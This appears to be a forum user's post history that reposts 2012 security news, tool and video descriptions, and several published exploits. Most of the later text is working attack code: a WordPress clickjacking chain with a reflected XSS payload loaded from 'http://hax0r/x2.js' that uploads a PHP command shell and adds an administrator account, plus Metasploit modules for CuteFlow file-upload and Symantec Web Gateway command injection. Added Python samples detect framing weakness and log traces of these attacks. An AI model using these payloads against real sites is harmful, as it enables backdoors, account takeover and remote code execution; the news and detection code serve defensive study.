Wubi

Everything posted by Wubi

  1. SQL injection attacks up 69% | ZDNet

     Summary: The number of SQL injection attacks has jumped by more than two thirds: from 277,770 in Q1 2012 to 469,983 in Q2 2012. This may be what hackers are using to steal all those e-mail addresses and passwords as of late.

     By Emil Protalinski for Zero Day | July 27, 2012 -- 20:20 GMT (13:20 PDT)

     SQL injection attacks are becoming significantly more popular amongst hackers, according to recent data. Between Q1 2012 and Q2 2012, there has been an estimated 69 percent increase of this attack type.

     The latest numbers come from secure cloud hosting company FireHost, which blocks various types of attacks that are attempting to harm its clients' Web applications and databases hosted at the firm's U.S. and European data centres. The company has broken down its findings into four different attack types which it considers as being the most malicious and dangerous: Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

     Here's where the 69 percent number for SQL injection attacks comes in: FireHost has seen a rise from 277,770 blocked attacks in the first quarter to 469,983 in the second quarter. The company also notes this attack type is frequently cited as an attack vector of choice for data thieves.

     For the uninitiated, SQL injection involves the entering of malicious commands into URLs and text fields on vulnerable websites. The goal is to steal the contents of databases and then use that information for further crime. SQL injection attacks have been associated with many high profile data breaches, such as when LulzSec hacked Sony in 2011. The data is from this year, however, so what gives? Well, the method is also often used by hackers to steal user account credentials such as e-mail addresses and passwords.

     In the last few months, there have been a slew of attacks against the following sites: LinkedIn, eHarmony, Last.fm, Yahoo, Android Forums, Billabong, Formspring, Nvidia, and Gamigo, among others. I doubt they were all SQL injection attacks, but I wouldn't be surprised if many were.

     "Many, many sites have lost customer data in this way," Chris Hinkley, a Senior Security Engineer at FireHost, said in a statement. "SQL injection attacks are often automated and many website owners may be blissfully unaware that their data could actively be at risk. These attacks can be detected and businesses should be taking basic and blanket steps to block attempted SQL Injection, as well as the other types of attacks we frequently see."

     Source: SQL injection attacks up 69% | ZDNet
  2. Twitter malware warning: It's you on photo? or It's about you? | ZDNet

     Summary: A new piece of malware is spreading on Twitter by getting users to click on a link that allegedly features a photo of them. There is no such photo on the other end.

     By Emil Protalinski for Zero Day | July 27, 2012 -- 17:09 GMT (10:09 PDT)

     Security researchers have discovered a new Twitter scam campaign that is spreading quickly across the social network by claiming to be a photo of the victim. Please be warned: there is no photo. There are, however, individuals very interested in putting the Blackhole exploit kit onto your computer (note: this is not the first time Twitter users are specifically being targeted, and it certainly won't be the last).

     The malware uses at least two different messages to spread. Twitter searches for "It's you on photo?" and "It's about you?" show that the scam is still circulating widely. As you can see in the screenshot above, the malicious tweets follow this pattern (please note that the cybercriminals can change the scam's wording as they please):

     I'm EmilProtalinski on Twitter. As such, if I was targeted by this scam, the message would look like this:

     Sophos, which first discovered this threat, detects the malware at the end of the link as "Troj/JSRedir-HY" and "Troj/Agent-XES." The security firm says the script redirects to an IP address which in turn redirects to a .cu.cc domain to load executable code, ultimately taking you to a .su domain that contains the Blackhole exploit kit.

     "Thousands of malicious links are being spammed out, targeting innocent users of the micro-blogging network," a Sophos spokesperson said in a statement. "There's a real danger that if Twitter users have not properly protected their PCs, and unless they are warned of the risk, that many people will click on the links without suspecting that they are putting their computer and personal data at risk."

     Webroot says that in addition to this English-based attack, a Russian spam campaign, which started on July 23, appears to be the origin of this attack. This makes sense given that many of the domains appear to be .ru (and the redirection seems to take place through traffichouse.ru).

     "The campaign is currently propagating in the following way – an automatically generated subdomain is spamvertised with an .html link consisting of the name of the prospective victim," a Webroot spokesperson said in a statement. "The cybercriminals behind the campaign are harvesting Twitter user names, then automatically generating the username.html files."

     As a general word of caution, don't click on random Twitter links that are directed at you. If you aren't sure why someone is sending you a link, ask them.

     Source: Twitter malware warning: It's you on photo? or It's about you? | ZDNet
  3. BT: Almost every Android device is infected with malware | ZDNet

     Summary: British Telecom says that one third of Android apps are compromised with some form of active or dormant malware, and that almost every Android device is infected. Something doesn't add up here.

     By Emil Protalinski for Zero Day | July 27, 2012 -- 18:09 GMT (11:09 PDT)

     British Telecom (BT) has made some rather eyebrow-raising statements about Google's mobile operating system. We all know Android malware is a problem, but a BT security expert speaking at the NetEvents Americas conference has just made it sound like an epidemic that is affecting everyone.

     "We analyzed more than 1,000 Android applications and found a third compromised with some form of active or dormant malware," Jill Knesek, head of the global security practice at BT, said according to EE Times. "Almost every device is compromised with some kind of malware, although often it's not clear if that code is active or what it is doing."

     I've been covering the Android malware issue for quite some time, and while there is definitely more and more of it in the wild (last month was particularly bad), there is no way BT's claims are on target. I'm not sure which 1,000 Android apps BT chose to use in its analysis, but I doubt they were randomly picked. I find it very hard to believe that one third of Android apps contain malware and that almost every device has one of said apps installed.

     This made me wonder why BT would be making such statements. I know that the U.K. telecom service provider sued Google over Android as well as other products late last year, but that's not enough of a reason for BT to hate on Android. This seems to me like some kind of miscommunication, a quote that has been taken out of context, or simply a poorly informed BT employee.

     I have contacted BT about these claims. I'll update you if and when I hear back.

     Source: BT: Almost every Android device is infected with malware | ZDNet
  4. Enterprise log searching and archiving has always been a difficult task for open source applications. ELSA plans on changing that.

     There are a number of free, open-source solutions out there which will provide a means for log collection, searching, and alerting, but they are not designed to scale to collecting all events from a large organization, while still making that data full-text searchable with millisecond response times. Commercial solutions do exist, which cost a LOT. Introducing ELSA!

     So, ELSA is inspired by Splunk and provides a centralized syslog framework on Syslog-NG, MySQL, and Sphinx full-text search. To be precise, ELSA is a three-tier log receiver, archiver, indexer, and web frontend for incoming syslog. It provides a fully asynchronous web-based query interface that normalizes logs and makes searching billions of them for arbitrary strings as easy as searching the web. It also includes tools for assigning permissions for viewing the logs as well as email based alerts, scheduled queries, and graphing.

     ELSA was born because commercial tools were both lacking, cost prohibitive and perhaps slow to receive the log volume on the hardware available with a tight budget. It is focused on speed versus dashboards and presentation.

     ELSA is a solution to achieve the following:
     - Normalize, store, and index logs at unlimited volumes and rates
     - Provide a simple and clean search interface and API
     - Provide an infrastructure for alerting, reporting and sharing logs
     - Control user actions with local or LDAP/AD-based permissions
     - Plugin system for taking actions with logs
     - Exist as a completely free and open-source project

     ELSA accomplishes these goals by harnessing the highly-specialized strengths of other open-source projects: Perl provides the glue to asynchronously tie the log receiver (Syslog-NG) together with storage (MySQL) and indexing (Sphinx Search) and serves this over a web interface provided either by Apache or any other web server, including a standalone pure-Perl server for a lighter footprint.

     Features offered by ELSA:
     - High-volume receiving/indexing (a single node can receive > 30k logs/sec, sustained)
     - Full Active Directory/LDAP integration for authentication, authorization, email settings
     - Instant ad-hoc reports/graphs on arbitrary queries even on enormous data sets
     - Email alerting, scheduled reports
     - Plugin architecture for web interface
     - Distributed architecture for clusters
     - Ships with normalization for some Cisco logs, Snort/Suricata, Bro, and Windows via Eventlog-to-Syslog or Snare

     ELSA ships with several plugins such as Windows logs from Eventlog-to-Syslog, Snort/Suricata logs, Bro logs, and URL logs from httpry_logger. These plugins tell the web server what to do when a user clicks the "Info" link next to each log. It can do anything, but it is designed for returning useful information in a dialog panel in ELSA with an actions menu. New plugins can be added easily by subclassing the "Info" Perl class and editing the elsa_web.conf file to include them. Contributions are welcomed by the author!

     ELSA has been found working with Ubuntu, openSUSE, CentOS, and FreeBSD operating systems, untested on *BSD, Syslog-NG 3.1, MySQL 5.1, Sphinx search, Apache, and Perl.

     It is a complex system and will require a fair amount of initial configuration, but once it is up and running, it will not need much maintenance or tuning. If you run into issues, let the author know and he will try to help you get up and running. ELSA is available under GPLv2 licensing.

     Download ELSA: elsa.tar.gz

     Source: PenTestIT — Your source for Information Security Related information!
  5. Description: This and more videos in: Blog de Omar
     You can download the software Stake LC5 and the rainbow tables in: Blog de Omar and El Palomo | Facebook
     Follow me: @ELPalomo_Blog

     The video shows the following procedures:
     - How Windows saves the passwords: LM hash / NTLM hash
     - How to get the password via PWDUMP
     - How the Rainbow Tables work
     - Cracking the password with Stake LC5 via Rainbow Tables

     Spanish version: Cracking Password Windows Con Rainbow Tables - Español

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
     Original Source:
  6. Description: Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
     Visit: [in]Seguridad Informática

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
     Original Source:
  7. Description: Video demonstration in which the ProxyStrike tool is used to audit a site and exploit its vulnerabilities with SQLmap.

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
     Original Source:
  8. Wordpress =< 3.1.2 Clickjacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

####
# Exploit Title: Wordpress =< 3.1.2 Clickjacking Exploit 0day
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/Algerian.Cyber.Army
# Home : http://quran4you.eb2a.com
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Google Dork: "powered by wordpress"
# Security Risk: critical
# Tested on: Windows Seven Edition Integral / French
####
# I'm Caddy-dz member from Inj3ct0r Team
# [+] Site : 1337day.com
# [+] Support e-mail : submit[at]1337day.com

#PS: No Protection of clickjacking in WordPress 3.1.2 and earlier

Exploit Process :
1- Lure WordPress admin to a webpage : A clickjacking page with an invisible Plugin Install webpage from their own WordPress admin console on top of a visible dummy page
2- Get them to click : They can't see that they're clicking an "Install Now" button
3- Install Vulnerable Plugin : They have installed SlidePress, a vulnerable plugin
4- Detect Click Happened : Using onloaded="function()"
5- Exploit Vulnerable Plugin : Exploit Cross Site Scripting in SlidePress
6- Install Backdoor : Upload a shell as a plugin =)

How does Plugin installation work?
- A ZIP archive gets unpacked into http://victim.com/wp-content/plugins/
- Installed but not activated
- The Install Now button is in an iframe pointing to the WordPress admin console
- The Admin user's browser automatically authenticates with session cookies. The Admin must be logged in.

# CJ V1 Exploit :
=================
<html>
<head><title>Clickjack Exploit for WordPress v1</title></head>
<body>
<style>
#outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:0; }
#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }
#para { width:650px; }
</style>
<h1>WordPress Clickjack Exploit v1</h1>
<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi. <a href="#">read more</a> </p>
<div id="outerdiv">
<iframe id="inneriframe" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">
wordpress
</iframe>
</div>

PS: How do I stop redirecting after installing the plugin?
- An iframe within an iframe
- The inner frame which loads the Plugin webpage is named _parent

<iframe id="innerframe" class="innerframe" scrolling="no" src="data:text/html;charset=utf-8,
---snip---
<iframe name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php...'>
</iframe>">
</iframe>

PS: How to leverage the power to install an arbitrary plugin?
* Find a vulnerable plugin
- For example SlidePress is vulnerable to Reflected Cross Site Scripting (XSS)
- Vulnerable when installed but not activated so only one click is required.
* Proof of concept exploit :
||>> http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=</script><script>alert(document.cookie)</script>&sspGalleryId=1
- Injects JavaScript into a webpage
- Can add an admin user or upload a backdoor
* How do I automatically start XSS after the Plugin installs?
- I need to detect when the user clicks
- Use the load method of the iframe
- 1st load is the page load, 2nd load is the stolen click
||>>
function frameloaded() {
  load_count=load_count+1;
  if (load_count==2) {
    // exploit time
    ex();
  }
}
---snip---
<iframe class='attacksite' onload='frameloaded()

Upon the 2nd frame load, ex() is called to perform the XSS attack
- Stage2 is loaded with the SlidePress page which contains a XSS vulnerability
- The XSS payload is stored at http://hax0r/x2.js
||>>
function ex() {
  top.document.getElementById('stage2').src='http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=http://hax0r/x2.js?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=/&a=></if'+'rame>';
}
---snip----
<iframe id="stage2"></iframe>

* exploit source code :
=======================
<style>
#outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:135px; left:445px; z-index:10; opacity:0; }
.stage2 { opacity:0; }
#para { width:600px; }
.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }
</style>
<h1>WordPress Clickjack Exploit v1</h1>
<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>
<div id="outerdiv" >
<iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8, — snip— ">
</iframe>
</div>
<iframe class='stage2' style='height:0px;width:0px;' id='stage2'> </iframe>

<iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,
<style> .inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }</style>
<script>
var load_count=0;
function frameloaded() {
  load_count=load_count+1;
  if (load_count==2) {
    ex();
  }
}
function ex() {
  top.document.getElementById('stage2').src='http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=http://hax0r/x2.js?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=/&a=></if'+'rame>';
}
</script>
<iframe id='inneriframe' class='inneriframe' onload='frameloaded();' name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=slidepress&TB_iframe=true&width=640&height=581'> </iframe>
"></iframe>

* How do I upload a backdoor with SlidePress's Cross Site Scripting?
* Use JavaScript to force the admin's browser to:
- Use SlidePress XSS to call a payload script on another website <script src="http://hax0r/x2.js">
- Get the CSRF wpnonce token from the Update page using XMLHttpRequest()
- Upload a Plugin using XMLHttpRequest.sendAsBinary which unpacks a backdoor to http://wordpress/wp-content/plugins/shell/shell.php

[*] Payload to upload PHP Shell :
=================================
// x2.js payload to upload PHP shell to wordpress.
// /wp-content/plugins/shell/shell.php?cmd=ls
path_to_wp = "/";
xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",path_to_wp + "/wp-admin/plugin-install.php?tab=upload",true);
xmlhttp.onreadystatechange=function() {
  if (xmlhttp.readyState==4) {
    response=xmlhttp.responseText;
    nonce=response.split('hidden" id="_wpnonce')[1];
    nonce=nonce.split('"')[4];
    xmlhttp.open("POST", path_to_wp + "/wp-admin/update.php?action=upload-plugin",true);
    xmlhttp.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------304661183327760");
    // shell.zip contains shell.php which is <? passthru($_REQUEST['cmd']); ?>
    post_data="-----------------------------304661183327760\r\n"+
      "Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n"+
      nonce + "\r\n"+
      "-----------------------------304661183327760\r\n"+
      "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n"+
      path_to_wp + "/wp-admin/plugin-install.php?tab=upload\r\n"+
      "-----------------------------304661183327760\r\n"+
      "Content-Disposition: form-data; name=\"pluginzip\";\r\n"+
      "filename=\"shell.zip\"\r\n"+
      "Content-Type: application/octet-stream\r\n\r\n";
    post_data=post_data+"\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00…";
    xmlhttp.setRequestHeader("Content-Length",post_data.length);
    xmlhttp.sendAsBinary(post_data);
  }
}
xmlhttp.send(null);

[*] Payload to add admin :
==========================
// payload to add administrator user
path_to_wp = "/";
new_username="caddy-dz";
new_password="caddy-dz";
new_email="caddy-dz%40hotmail.fr"; // %40 for @
xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",path_to_wp + "/wp-admin/user-new.php",true);
xmlhttp.onreadystatechange=function() {
  if (xmlhttp.readyState==4) {
    response=xmlhttp.responseText;
    nonce=response.split('hidden" id="_wpnonce')[1];
    nonce=nonce.split('"')[4];
    xmlhttp.open("POST", path_to_wp + "/wp-admin/user-new.php",true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    post_data="_wpnonce=" + nonce + "&action=adduser&user_login="+ new_username + "&first_name=&last_name=&email=" + new_email + "&url=&pass1=" + new_password + "&pass2=" + new_password + "&role=administrator&adduser=Add+User";
    xmlhttp.setRequestHeader("Content-Length",post_data.length);
    xmlhttp.send(post_data);
  }
}
xmlhttp.send(null);

# Peace From Algeria ..//
# Happy Ramadhan ..//
#
# Greets To :
# ==============================================================================#
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates , #
# TrOoN , jos_ali_joe , All Exploit-Id Team , (exploit-id.com) , (1337day.com) , #
# ... And All Algerian Hax0rs #
# ============================================================================================#
# 1337day.com [2012-07-27]
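The whole chain in the post above rests on one precondition: the admin's browser is willing to render wp-admin/plugin-install.php inside a frame on a page the attacker controls. The defensive check for that precondition is whether the server's responses carry an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive. The Python below is an added example written for this page; it is not code from the post, from its author or from WordPress. It classifies a response header set offline (the two header dictionaries at the bottom are constructed for the example, one showing an admin page with no framing restriction and one showing the same page hardened) and can be pointed at the headers of any real response you have captured.

```python
"""Classify whether an HTTP response may be framed by a foreign origin.

Added example for this page (not from the post or from WordPress). The
header sets at the bottom are constructed to illustrate the weak and the
hardened case; nothing here touches the network.
"""


def parse_csp(value):
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    directives = {}
    for part in value.split(';'):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def frame_policy(headers):
    """Return (frameable_by_other_origins, reason) for a response.

    `headers` maps header names to values; names are compared
    case-insensitively. CSP frame-ancestors is checked first because
    browsers that understand it give it precedence over X-Frame-Options.
    """
    lower = {name.lower(): value for name, value in headers.items()}

    csp = lower.get('content-security-policy', '')
    ancestors = parse_csp(csp).get('frame-ancestors') if csp else None
    if ancestors is not None:
        if ancestors == ["'none'"]:
            return False, "CSP frame-ancestors 'none'"
        if all(src == "'self'" for src in ancestors):
            return False, "CSP frame-ancestors 'self'"
        if '*' in ancestors or any(src in ('http:', 'https:') for src in ancestors):
            return True, 'CSP frame-ancestors allows any origin: ' + ' '.join(ancestors)
        return False, 'CSP frame-ancestors limited to ' + ' '.join(ancestors)

    xfo = lower.get('x-frame-options', '').strip().upper()
    if xfo in ('DENY', 'SAMEORIGIN'):
        return False, 'X-Frame-Options ' + xfo
    if xfo.startswith('ALLOW-FROM'):
        # Not honoured by every browser; treat as unprotected.
        return True, 'X-Frame-Options ALLOW-FROM is not reliably enforced'
    if xfo:
        return True, 'unrecognised X-Frame-Options value: ' + xfo
    return True, 'no X-Frame-Options or frame-ancestors header'


def audit(responses):
    """Evaluate {label: headers} and return {label: (frameable, reason)}."""
    return {label: frame_policy(hdrs) for label, hdrs in responses.items()}


# Constructed header sets: an admin page that can be framed, and the same
# page once the server sends a framing restriction.
WEAK_ADMIN_RESPONSE = {
    'Content-Type': 'text/html; charset=UTF-8',
    'Set-Cookie': 'wordpress_logged_in_example=token; HttpOnly',
}

HARDENED_ADMIN_RESPONSE = {
    'Content-Type': 'text/html; charset=UTF-8',
    'Set-Cookie': 'wordpress_logged_in_example=token; HttpOnly',
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "frame-ancestors 'self'",
}

if __name__ == '__main__':
    results = audit({'weak': WEAK_ADMIN_RESPONSE, 'hardened': HARDENED_ADMIN_RESPONSE})
    for label, (frameable, reason) in results.items():
        print(f"{label:9s} frameable={frameable!s:5s} {reason}")
```

Sending both headers, as the hardened set does, covers old browsers that only know X-Frame-Options and new ones that prefer frame-ancestors; the check treats ALLOW-FROM as unprotected because not every browser enforces it.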
  9. CuteFlow v2.11.2 Arbitrary File Upload Vulnerability

     EDB-ID: 20111 | CVE: N/A | OSVDB-ID: N/A
     Author: metasploit | Published: 2012-07-27 | Verified:
     Exploit Code: | Vulnerable App: N/A

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "CuteFlow v2.11.2 Arbitrary File Upload Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.
				This application has an upload feature that allows an unauthenticated user
				to upload arbitrary files to the 'upload/___1/' directory and then execute it.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
				],
			'References'     =>
				[
					['URL', 'http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']
					#['OSVDB', ''],
					#['EDB', ''],
				],
			'Payload'        =>
				{
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					['Automatic Targeting', { 'auto' => true }]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jul 27 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The path to the web application', '/cuteflow_v.2.11.2/'])
			], self.class)
	end

	def check
		base = target_uri.path
		base << '/' if base[-1, 1] != '/'

		res = send_request_raw({
			'method' => 'GET',
			'uri'    => "#{base}"
		})

		if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/
			return Exploit::CheckCode::Vulnerable
		elsif res.body =~ /\<a href\=\"http\:\/\/cuteflow\.org" target\=\"\_blank\"\>/
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def upload(base, fname, file)
		# construct post data
		boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
		data_post = "--#{boundary}\r\n"
		data_post << "Content-Disposition: form-data; name=\"attachment1\"; filename=\"#{fname}\"\r\n"
		data_post << "Content-Type: text/php\r\n"
		data_post << "\r\n"
		data_post << file
		data_post << "\r\n"
		data_post << "--#{boundary}\r\n"

		# upload
		res = send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{base}pages/restart_circulation_values_write.php",
			'ctype'  => "multipart/form-data; boundary=#{boundary}",
			'data'   => data_post,
		})
		return res
	end

	def exploit
		base = target_uri.path
		base << '/' if base[-1, 1] != '/'
		@peer = "#{rhost}:#{rport}"

		# upload PHP payload to upload/___1/
		print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
		fname = rand_text_alphanumeric(rand(10)+6) + '.php'
		php = %Q|<?php
#{payload.encoded} ?>|
		res = upload(base, fname, php)
		if res.nil?
			print_error("#{@peer} - Uploading PHP payload failed")
			return
		end

		# retrieve and execute PHP payload
		print_status("#{@peer} - Retrieving file: #{fname}")
		send_request_raw({
			'method' => 'GET',
			'uri'    => "#{base}upload/___1/#{fname}"
		})

		handler
	end
end
  10. Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection

     EDB-ID: 20113 | CVE: 2012-2953 | OSVDB-ID: N/A
     Author: metasploit | Published: 2012-07-27 | Verified:
     Exploit Code: | Vulnerable App: N/A

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",
			'Description'    => %q{
					This module exploits a command injection vulnerability found in Symantec Web
				Gateway's HTTP service. While handling the filename parameter, the Spywall API
				does not do any filtering before passing it to an exec() call in proxy_file(),
				thus results in remote code execution under the context of the web server.
				Please note authentication is NOT needed to gain access.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'muts',   # Original discovery
					'sinn3r'  # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2012-2953' ],
					[ 'BID', '54426' ],
					[ 'EDB', '20088' ],
					[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00']
				],
			'Payload'        =>
				{
					#'BadChars' => "\x00\x0d\x0a",
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet'
						}
				},
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Symantec Web Gateway 5.0.2.18', {}]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jul 23 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The URI path to pbcontrol', '/spywall/pbcontrol.php'])
			], self.class)
	end

	def check
		dir  = File.dirname(target_uri.path)
		res1 = send_request_raw({'uri' => "#{dir}/login.php"})
		res2 = send_request_raw({'uri' => "#{dir}/pbcontrol.php"})

		if res1 and res2
			if res1.body =~ /\<title\>Symantec Web Gateway\<\/title\>/ and res2.body =~ /^0$/
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		send_request_cgi({
			'uri'      => target_uri.path,
			'method'   => 'GET',
			'vars_get' => {
				'filename' => "#{Rex::Text.rand_text_alpha(4)}\";#{payload.encoded};\"",
				'stage'    => '0'
			}
		})

		handler
	end
end
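Both modules above leave distinctive traces in the web server's access log: the CuteFlow module (post 9) POSTs to pages/restart_circulation_values_write.php and then fetches a .php file from upload/___1/, and this module sends its command to pbcontrol.php in a filename parameter of the form <letters>";<command>;". The Python below is an added example written for this page, not code from Metasploit, Symantec or CuteFlow; it parses Apache/nginx combined-format access log lines (the sample lines are constructed) and flags both patterns, so a defender can run it over a real log to find attempts against either product.

```python
"""Access-log detection for the CuteFlow upload and pbcontrol.php injection.

Added example for this page, not part of the Metasploit modules or of the
vendors' products. It assumes Apache/nginx combined-format access logs;
the sample lines are constructed. Two patterns are flagged:
  * a request to pbcontrol.php whose 'filename' parameter contains shell
    metacharacters (the Symantec Web Gateway module sends the payload as
    filename=<alpha>";<cmd>;"), and
  * a POST to CuteFlow's restart_circulation_values_write.php upload handler
    or a request for a .php file under upload/___1/, which is the
    retrieve-and-execute step of the CuteFlow module.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that terminate or chain a shell command; a plain filename
# (letters, digits, dots, dashes, underscores, slashes) never needs them.
SHELL_META = re.compile(r'[;|&`"$]')


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def check_pbcontrol(method, url):
    """Flag pbcontrol.php requests whose filename carries shell metacharacters."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith('/spywall/pbcontrol.php'):
        return None
    # parse_qs percent-decodes, so %22%3B is already "; when tested
    for value in parse_qs(parts.query, keep_blank_values=True).get('filename', []):
        if SHELL_META.search(value):
            return 'pbcontrol.php filename command injection attempt'
    return None


def check_cuteflow(method, url):
    """Flag the CuteFlow upload handler and execution of files in upload/___1/."""
    path = urlsplit(url).path
    if re.search(r'/upload/___1/[^/]+\.php$', path, re.IGNORECASE):
        return 'request for a PHP file in CuteFlow upload/___1/'
    if method == 'POST' and path.endswith('/pages/restart_circulation_values_write.php'):
        return 'POST to CuteFlow unauthenticated upload handler'
    return None


def scan(lines):
    """Return (client ip, url, finding) for every line that trips a check."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for check in (check_pbcontrol, check_cuteflow):
            hit = check(rec['method'], rec['url'])
            if hit:
                findings.append((rec['ip'], rec['url'], hit))
    return findings


# Constructed sample log: one benign pbcontrol request, one injection
# attempt, and the upload-then-fetch pair of the CuteFlow module.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jul/2012:10:15:01 +0000] "GET /spywall/login.php HTTP/1.1" 200 5123',
    '10.0.0.5 - - [27/Jul/2012:10:15:02 +0000] "GET /spywall/pbcontrol.php?filename=kXyz%22%3Bperl+-e+%27print+1%27%3B%22&stage=0 HTTP/1.1" 200 1',
    '10.0.0.9 - - [27/Jul/2012:10:16:40 +0000] "POST /cuteflow_v.2.11.2/pages/restart_circulation_values_write.php HTTP/1.1" 200 312',
    '10.0.0.9 - - [27/Jul/2012:10:16:41 +0000] "GET /cuteflow_v.2.11.2/upload/___1/Qw3rtYui.php HTTP/1.1" 200 0',
    '10.0.0.7 - - [27/Jul/2012:10:17:00 +0000] "GET /spywall/pbcontrol.php?filename=report.txt&stage=0 HTTP/1.1" 200 1',
]

if __name__ == '__main__':
    for ip, url, finding in scan(SAMPLE_LOG):
        print(f'{ip:10s} {finding}: {url}')
```

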